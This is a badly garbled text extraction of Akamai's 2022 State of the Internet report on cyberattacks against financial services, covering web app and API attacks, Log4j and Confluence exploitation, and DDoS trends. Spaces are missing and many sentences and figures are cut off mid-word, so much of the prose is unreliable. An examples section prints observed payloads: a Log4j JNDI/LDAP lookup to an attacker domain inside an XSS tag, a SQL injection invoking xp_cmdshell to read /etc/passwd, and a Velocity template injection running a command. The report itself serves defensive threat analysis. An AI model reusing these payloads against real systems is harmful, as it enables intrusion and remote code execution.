Akamai：2022年互联网现状报告

ssue [StateoftheInternet]Tableofcontents2Introductionrsends32SummaryCreditsEnemyattheGatesVolumeIssueSOTI1IntroductionesthathavebeentheheaviesthitbydotherbankingtrojanstoDistributedisavitalsectorthatplaysamajorrolenotonlyinthelivesofpeople,butalsointheglobaleconomy.Anydisruptionordowntimeoffinancialservicescarriesseriousimplications,andthesensitivedatatheseorganizationsholdcanbeturnedintoawiderangeofattacksagainstthem,fromnewlydiscoveredzero-dayvulnerabilitiestotried-and-truephishingattacks.snosecretthenthatattackersarehighlyfocusedandmotivatedtoattacktheshingorfraudbutthistimewehavetakenamuchbroaderapproachandcoveranumberofissuesaffectingthisoftenattackedindustry.hisbroaderlenshasallowedustoseetheimmensesurgeinthenumberofattacksondustryandthealarmingspeedatwhichattackersareleveragingalargeportionofattackerschoosingtoforgoattacksononeofthemostsecureindustriesintheworld,andinsteadattacktheirconsumersenmasse.Withthisenemystandingatthegate,itisimportantforFinServsecurityprofessionalstounderstandhowthethreatlandscapeisshifting.Ourreportincludesthesekeypoints:EnemyattheGatesVolumeIssueSOTI2Thefinancialservicesindustryconsistentlyranksinthetopthreetargetedverticalsforwebapplicationthehighestgrowthofanymajorindustry.Within24hours,theexploitationofrabilitiesnreachmultiplethousandsofattacksperhourandpeakquickly,affordinglittletimetopatchandreact.AsignificantincreaseinLocalFileattacksdemonstrateshowattackersareshiftingtowardremotettemptsthatntheinternalsecuritynetwork.tomersisrampantckersfocusingoncustomeraccountsratherthantheorganizationsthemselves,eitherdirectlyorviaphishing-relatedactivities.hingcampaignslikeKrptoareintroducingtechniquesthatbypasstwo-factorauthentication(2FA)solutionsusingone-timepasswordtokensorpushnotifications.EnemyattheGatesVolumeIssueSOTI3Thethreatlandscape:attacksonfinancialservicesgrowThefinancialservicesverticalcontinuestobeoneofthemostwidelyattackedindustriesintheworldandthenumberofattacksshowssignsofgrowing.WebapplicationandAPIattacksinparticularareincreasingatanalarmingratewhilealsogrowingincomplexity.Attackersareseekingtogainafootholdtointernalnetworksandcausedisruptionasameansofpressuringorganizationstopaymoneytopreventfurtherdamages.AsavitalalservicesneedtobeupandrunningAttackerscouldalsomonetizestolensensitiveinformationorgainaccesstocustomer’saccountsandstealtheirmoney.havesettheirsightsonfinancialservicesanditscustomersandassuchybersecurityawarenessandincreaseitsITbudgeturityFailuretosafeguardtheirperimeteranddatacouldresultinbreachesbyransomwareandotherthreatsandconsequentlysignificantcriticaldataandfinancialabreachesagainstfinancialservices,whichisconsidered“criticalinfrastructure,”hasanaveragecostofUSmillionEnemyattheGatesVolumeIssueSOTI4Tofullyunderstandthevariousrisksthatfinancialservicesface,wemustlookatthethreatlandscapeasawholeTodoso,weturntoamultitudeofdataonactivitiessuchasbottrends(bothmaliciousandbenign),exploitationattemptsagainstcriticalmpaignsWealsoprobeattheattacker’sInternetProtocol(IP)todrawoutconclusionsregardingtheattacker’smotivations.Welookatayear’sworthofdatatocreateasnapshotofthefinancialservicesthreatlandscape(Figure1).Atthefeetviewfinancialservicestopthelistofattackedverticalsinseveralexploitation,andbotnetactivities.MostconcerningistheaforementionedstaggeringndAPIattacksaxgrowthinthenumberofattacksagainstfinancialservices.Botnetactivitiesarealsoontherisearoundfinancialservicesorganizations.increaseinwebapplicationscks881%botactivity222%increaseinDDoStargetsEachvectorpresentsdifferentsecurityrisksandchallengesthatfinancialservicesneedtoaddresstoenhancetheirsecuritypostureAsweprogressthroughthereportwewillexaminevariousattackvectorsinmoredetail,butoverall,thisreportjustifiesthefinanceindustry’sinvestmentincybersecurity.EnemyattheGatesVolumeIssueSOTI5Growingsecurityrisk:applicationandAPIattacksWebapplicationsandAPIscontinuetobeanimportantconsiderationforfinancialservices.Theyarekeytomanytransformationeffortsandthey’rehowbanksopenuptothirdpartiestocreatebetterexperiencesforcustomersandtogainmorevalueandcompetitiveappstoavailawiderangeofbankingservices.Althoughtheusageofbankingappswasboomingpriortothestancessurroundingthepandemiceglockdownsfurtherincreasedtheiruse.ManyorganizationsareadoptingtheuseofAPIintotheirecosystembecauseofitsnotabletheStateoftheAPIreportfromPostmanofrespondentscitedinvestmentsinAPIdevelopmentswilllikelyincreasethisyearInotherinstanceservicesproviderscouldaccesstheircustomerdatainrelationtoloans,accounts,etc.standardizedthedataconnectionorexchangeofcustomerfinancialinformationamongorganizationsandthirdparties.Webapplications,onniencefasterprocessingandreliabilitytheyoffertocustomers,andreducecostsforfinancialservicesorganizations.However,thevulnerabilitiesinthesewebapplicationscouldallowattackerstocompromiseemanybenefitsandadvantages,theycouldalsointroduceanewattacksurfaceforcybercriminalstoemploy.amassiveincreaseoverthepastmonths,andfinancialservicescontinuestofeatureprominentlyamongtargetedindustries.Inouranalysiswefoundfinancialservicestobethethirdmostattackedverticalwith%ofoverallattacks,followingcloselyontheheelsofhightechnology,thesecond-mosteFormostoftheyearfinancialserviceshadsurpassedhightechnologyforthelargestnumberofoverallattacks.Atthe10,000-feetview,financialservicestopthelistofattackedverticalsinseveralcriticalareas:webapplicationmergingvulnerabilitiesexploitation,andbotnetactivities.EnemyattheGatesVolumeIssueSOTI6VerticalCommerce HighVerticalCommerce HighTechnologyFinancialServices VideoMedia ManufacturingOtherDigitalMediaPublicSectorSocialMediaGamingBusinessServicesGamblingPharma/HealthcareNonprofit/EducationWebAppsandAPIAttacksbyIndustry20%320%30%40%TheimportanceofwebapplicationandAPIsinfinancialservicesoperationscontinuestoinviteattackerstolookforvulnerabilitiesandwaysofattackingorganizations.First,ecurityisatoughchallengewhenbuildingthemVulnerabilitiesresidinginthesewebocaptureandstoreconfidentialcustomerinformation(i.e.,logincredentials).Onceattackerslaunchwebapplicationsattackssuccessfully,theycouldstealconfidentialccesstoanetworkandobtainmorecredentialsthatcouldallowthemtomovelaterally.Asidefromtheimplicationsofabreach,stoleninformationcouldbepeddledintheundergroundorusedforotherattacks.hisishighlyconcerninggiventhetrovesofdatasuchaspersonalidentifiableinformationandaccountdetails,heldbythefinancialservicesvertical.AttacksonfinancialserviceswebapplicationsandAPIsareontheriseandsignifyacontinuedandgrowinginterestinfinancialservicesandtheircustomers.ThisyearhasacksonfinancialservicesThisrepresentsthewiththeexceptionofgamblingwhichdoesnotseeasignificantamountofwebapplicationfirewall(WAF)attacksoverall.Thisincreaserepresentsthegrowinginterestinattacksurfacesthatmayleadtofinancialservicesbreaches.EnemyattheGatesVolumeIssueSOTI7AttackCountAttackCountDailyWebAppsandAPIAttacks—FinancialServicesOverthepastmonthsfinancialserviceshasseenconsistentattackgrowthandthespikesobservedinFigure3seemstoindicatetargetedorfocusedattacks.Morethanthat,thesepatternscouldsuggestthegrowingriskofwebapplicationattacksagainstbyPositiveTechnologiesshowedbreachofpersonalppssincevulnerabilitiesresidingtherecouldbeusedasannttobreachtargetorganizationsUnderstandingthetypesofattacksandwhatldhelporganizationsknowhowtoproperlyprotectthesewebappsEnemyattheGatesVolumeIssueSOTI8AttackCountAttackCountervingregionaltrendsgivesusanopportunitytocomparegrowthinvariousareasoftheworld(Figure4).RegionalTrends202220222020212020212020212020222021202022nnexponentialgrowthinLatinAmericaLATAMThedigitizationandlimitedcybercrimegovernancecouldbetwoofthefactorsthatcontributetothegrowingalactivitiesintheregionCybercrimecoststheregionUSbillionannuallyhreatsintheregionincludecryptojackingfraudbankingtrojansandransomware,illustratingthatcybercrimeinLATAMismorefinanciallymotivated.Justthislgovernmentwebsitesshowingthecripplingeffectsofransomwareasaservice(RaaS)beyondfinanciallosses.AcloserlookattheregionshowsusthatBraziltopsthelistofwebapplicationandAPIattacktargets.InBrazil,duetothehighusage/adoptionofonlinelatedthreatsewithanincreasingnumberofcyberattacksherieswithPIattacksinAPJEnemyattheGatesVolumeIssueSOTI9nandAPIattacksTheRussianandUkrainianconflictspurredwarningsofpotentialcyberattacksandretaliationagainstthefinancialsectorbothintheUnitedrvicescompaniesintheUnitedStateshadsufferedfromransomwarebankingtrojansandothermalware.theFINcybercriminalgroupbreachingcertainUSfinancialakedpaymentrecordsofbanksintheUnitedoundmarketplacesTomitigatetheCurrencyfinalizedarulein2021thatnecessitates“incidentnotification”bothtoafederalregulatorandtothebankingorganizations’customersduringsuspectedthreats.eshaslegislationonSecurityofNetworkandInformationuidanceandbaselineswhenitcomestocybersecurityanddataprotectioninthefinancialservicesandotherverticals.Althoughtheseregulationshelporganizationsbecomecyberresilient,itdoesnotnecessarilyfollowthattheorganizationsbecomeimmunetocyberattacks.SamplesofnotablecyberthreatsthatmaycontributetothisincludeBizarro,abankingtrojanthatextendeditstargetstoincreaseinattack/payloaddeliveryattempts.gdomhadthemostwebsinEuropeMiddleThisdatapointstothecontinuedinvestmentcriminalorganizationsareputtingintoleveragingautomationandreconnaissanceanditeratingmethodstoavoidruleslikegeoblocks.Thecontinuousrefinementofsecurityoleranceandensuringallinternetfacingcapabilitiesareunderacommonsecurityportfolio,areessential.EnemyattheGatesVolumeIssueSOTI10VectorsusedinapplicationandAPIattacksTounderstandthenatureoftheattacks,wecanzoomintothevariousattackvectorscommonlyusedagainstthisindustry.Itiscriticaltolookatvectorstobetterunderstandyourrisksandwhattypesofattacksyourorganizationwilllikelyencounter.Andthen,withthatknowledge,youcandevisemitigationstrategiestorampupyourdefensesagainsttheseattacksandpreventbreaches.WebApplicationandAPIAttacksbyVectorLFIXSSSQLiPHPiJSICMDiRFwthhasbeenprimarilydrivenbyfootholdintheirtargets’networks,ratherthansimplytoaccessadatabase.albleEnemyattheGatesVolumeIssueSOTI11vulnerabilitiestoinjectcodeintowebsites,andtheneachtimeusersvisitanycompromisedwebsite,theyareatriskofinformationexposure.AnothertypeofXSSisdeliveredfromtheattackertothevictimsviamaliciouslinksthatleadtothedownloadofapayload.Attackerstypicallyemploythisvectortoconductphishingattacksaswellaswebsitedefacement.ThehypergrowthinwebapplicationsandAPIattacksinthefinancialservicesverticalisanareaofconcernparticularlybecauseofitssecurityimplicationsHoweverhavingaclearknowledgeofattacksurfacesandvectorscouldaidfinancialservicescompaniesinsecuringtheirenvironment.Inthissection,wedemonstrateactualattackattemptsagainstfinancialservices.AsesamixofattackvectorsandvulnerabilitiesincludingrecentCVEsYoullseeinFigurethroughFigurethatsomeoftheattacksarecustomizedspecificallyfortheirintendedtarget,whilesomearemoregenericforpurposesofreconnaissance.aa=%3Cscript%20src%3D%24%7Bjndi%3Aldap%3A%2F%2F[REDACTED].com.80.s.mur.5ed.xyz%3A53%2F[REDACTED].com%7D%3Ealert()%3C%2Fscript%3Eaa=<scriptsrc=${jndi:ldap://[REDACTED].com.80.s.mur.5ed.xyz:53/[REDACTED].com}>alert()</script>attackerdomain.Itappearsthatthescriptishandcraftedtotheirspecifictargets.Moreover,stheattackertorunthescriptviaexploitationofOGNLvulnerabilitiesEnemyattheGatesVolumeIssueSOTI12EmployingvariousattackmethodsqkSOqkSO=9983AND1=1UNIONALLSELECT1,NULL,’<script>alert(“XSS”)</script>’,table_nameFROMinformation_schema.tablesWHERE2>1--/**/;EXECxp_cmdshell(‘cat../../../etc/passwd’)#ainingpersistenceqq=1&&wt=velocity&v.template=custom&v.template.custom=#set($x=%27%27)+#set($rt=$x.class.forName(%27java.lang.Runtime%27))+#set($chr=$x.class.forName(%27java.lang.Character%27))+#set($str=$x.class.forName(%27java.lang.String%27))+#set($ex=$rt.getRuntime().exec(%27cat%20/%65%74%63/%70%72%6f%66%69%6c%65%27))+$ex.waitFor()+#setv$out=$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#endqq=1&&wt=velocity&v.template=custom&v.template.custom=#set($x=’’)#set($rt=$x.class.forName(‘java.lang.Runtime’))#set($chr=$x.class.forName(‘java.lang.Character’))#set($str=$x.class.forName(‘java.lang.String’))#set($ex=$rt.getRuntime().exec(‘cat/etc/profile’))$ex.waitFor()#set($out=$ex.getInputStream())#foreach($iin[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#endtwareAnattackertriestoimplementRCEthroughmaliciouscodeinjectionoftheVelocitytemplateengine.Morespecifically,theattackerdumpsthecontentofthe/etc/profileUnixfile,whichisusedtosetsystem-wideenvironmentvariablesonusersshellsAttackersareprobingtoseeifthesystemisetheycangainpersistenceEnemyattheGatesVolumeIssueSOTI13ydisclosedvulnerabilitiesThesignificanceofapplicationandAPIattacksliesnotonlyinthegardenvarietyattacksghtussecurityhazardscriticalrabilitiestendtobeexploitedviaaplethoraoflesserknownvectorssuchOrganizationsareconsistentlyadvisedtopatchvulnerabilitiestoreducetheirwindowsofbeforedeployment,andprioritizingwhichvulnerabilitiestoaddressfirstcantaketime(ascanpatchfailuresThereforeitbecomesaraceagainsttimetoaddressthesesecurityflawsbeforeattackersstartexploitingthemtolaunchattacks.Forinstance,fiveminutesbilityintheirExchangeServertheHafniumrtedlyalreadyscanningforvulnerabilitiesTounderstandthelevelrabilitytoseehowitsappliedbyattackersagainstfinancialservices.lnerabilitieswehavefoundthatthefinancialservicesverticalisnearlyalwaysinthetopthreeofaffectedindustries,andtherisktheseattacksrithacriticalratingofthoughwehavefoundsignificantriskinothernewvulnerabilities,asinthecaseofLog4j.eviousblogpost,wediscussedtheincreasedexploitationofthisvulnerabilityinthedaysfollowingtheadvisorypublication.Forthisreport,wetookacloserlookattheinfluxofattackattemptsemployingthiscriticalflawagainstfinancialservices.Itiscrucialtohighlightttackersarequicktoleveragesuchsecuritybugsfortheirattacksandthedetrimentaleffectsitcouldposetoorganizationsiftheyfailtosecuretheirperimeter.EnemyattheGatesVolumeIssueSOTI14TopIndustriesbyAttackCount—ConfluenceVulnerabilityOtherDigitalMedia1.1%PublicSector0.9%Gambling0.8%BusinessServices0.6%Pharma/Healthcare0.3%Nonprofit/Education0.09%chnologyandexploitationattemptsoffinancialservicesversusallotherindustriesthatfollowthosetopitalmediamanufacturinggamblingbusinessservices,pharma/healthcare,gaming,socialmedia,andnonprofit/education.Itisnotablethatthefinancialservicesindustryequalsall11industriesthatfollowit,combined(Figure11).EnemyattheGatesVolumeIssueSOTI155/22/20225/29/20226/05/20226/06/20226/19/20225/20/20225/22/20225/24/20225/26/20225/28/20225/30/20226/1/20226/3/20226/5/20226/7/202265/22/20225/29/20226/05/20226/06/20226/19/20225/20/20225/22/20225/24/20225/26/20225/28/20225/30/20226/1/20226/3/20226/5/20226/7/20226/9/20226/11/20226/13/20226/15/20226/17/20226/19/20226/21/20226/23/2022NumberofExploitationAttemptsFigureandFiguredetailthenumberofattemptedexploitationsoftheConfluencevulnerabilityagainstthefinancialservicesvertical.Ananalysisofthedatarevealsthatinlessthan48hoursafterthedisclosure,exploitationattemptsagainstfinancialservicesedonJuneatUTCwithaedattackWealsoobservedaeonJuneNumberofExploitationAttempts(DetailedView)10k8kk4k2k0EnemyattheGatesVolumeIssueSOTI165/22/20225/29/20226/05/20226/12/20225/22/20225/29/20226/05/20226/12/20226/19/2022Thisexploitationrateisnotlimitedtothisparticularvulnerabilityaswe’veobservedalarrushtoexploitneworzerodayvulnerabilitiesagainstfinancialservicesasinthecaseofLog4jvulnerability.Thisseemstoindicatethatemergingvulnerabilitiesisoneofthetried-and-testedmethodsofinfiltratinganetwork,andthefinancialservicesindustryvulnerabilities.It’simperativethatorganizationskeepsystemsandappsupdatedtoenhancetheircybersecurityposture.NumberofUniqueIPsTheConfluencevulnerabilityisjustoneofthemanyexamplesofhowquicklyattackersabilitiestobreachanorganizationTheimportanttakeawayhereisfororganizationstosecuretheirinternet-facingassetswithtoolsthatallowforthemonitoringonandAPIattacksandtomakesuretheypatchonaregularbasistopreventsuchattacks.Incaseofemergingvulnerabilities,timeisoftheessence.Toavoidabreach,cybersecuritypractitionersmustconsiderthestepsneededtomitigaterabilitiessuchashavingsecuritymeasureslikeWAFstodetectmalicioustrafficerresponseinplaceEnemyattheGatesVolumeIssueSOTI17GamingFinancialServicesHighTechnology ManufacturingGamingFinancialServicesHighTechnology Manufacturing GamblingCommercePharma/HealthcareNonprofit/Education VideoMedia BusinessServicesPublicSectorOtherDigitalMediaSocialMediaDDoSattacks:shiftinregionaltargetsDDoSattacksfiguredprominentlyinattacksagainstfinancialinstitutionsprimarilyduringeenRussiaandUkraineBeforetheonsetofthephysicalwarinMarch2022,itappearsthata“cyberwar”transpiredfirstwithbothsideslaunchingaslewofanksitesdisruptthecesastheirSairportsthoughtheairports’operationswerenotimpacted.TopIndustriesbyDDoSAttack40%mosttargetedindustryinDDoSattacksnexttogamingFigureAttackersarepotentiallygoingafterabroaderrangeoftargetsineveryverticalandmovingquicklyamongthemtocircumventtheirdefenses.observeda“regionalshift”asthevolumeofDDoSattacksagainstedMeanwhileEMEAattackvolumehasincreased,despitetheloweroverallnumberoftargets.EnemyattheGatesVolumeIssueSOTI1810/1/202111/1/202112/1/20211/1/20222/1/20223/1/20224/1/2022510/1/202111/1/202112/1/20211/1/20222/1/20223/1/20224/1/20225/1/20226/1/20227/1/20228/1/20229/1/202210/1/2022ervicesilylevelWhileDDoSattacksremainsteadyFigureit’sworthnotingtheshiftofattacksrlookatyearoveryeargrowthseemstoindicatethatwhiletheUnitedStatestypicallyleadsinmosttypesofattacks,inrecentmonths,theirvolumeofnumberoftargets.EnemyattheGatesVolumeIssueSOTI19AttackCount20222021AttackCount20222021202120222021202220212022DDoSAttackCountbyRegion21–2022rbetweenUkraineandRussiafDDoSattacksagainstUKfinancialfirmsandothercyberattacksagainstWesternEuropeancountriesthatexpressedsupportforroupKillnetalsolaunchedattacksagainstwebsitesofItaly’ssenate,NationalHealthInstitute,andotherinstitutions,monthsafterthewarstarted.TheseDDoSattackscouldpotentiallybearetaliationagainstthosewhosupportpoliticsspillingintocyberspaceripplethebusinessoperationsoffinancialservicesDowntimebusinessdisruption,andrecoveryfromsuchattackscouldmeanfinanciallosstotheouldtaketheirwebsitesandservicesofflineandcouldimpacttheircustomersandbusinessoperationsingeneral.AneffectiveDDoSattackbasicallymeansabusinessiscutofffromtherestoftheinternet;customersareunabletoaccessaccountsandbusinessesmightthereforelosemoney.InancostfromapproximatelyUSuptoEnemyattheGatesVolumeIssueSOTI20Theramificationsoffallingvictimtosuc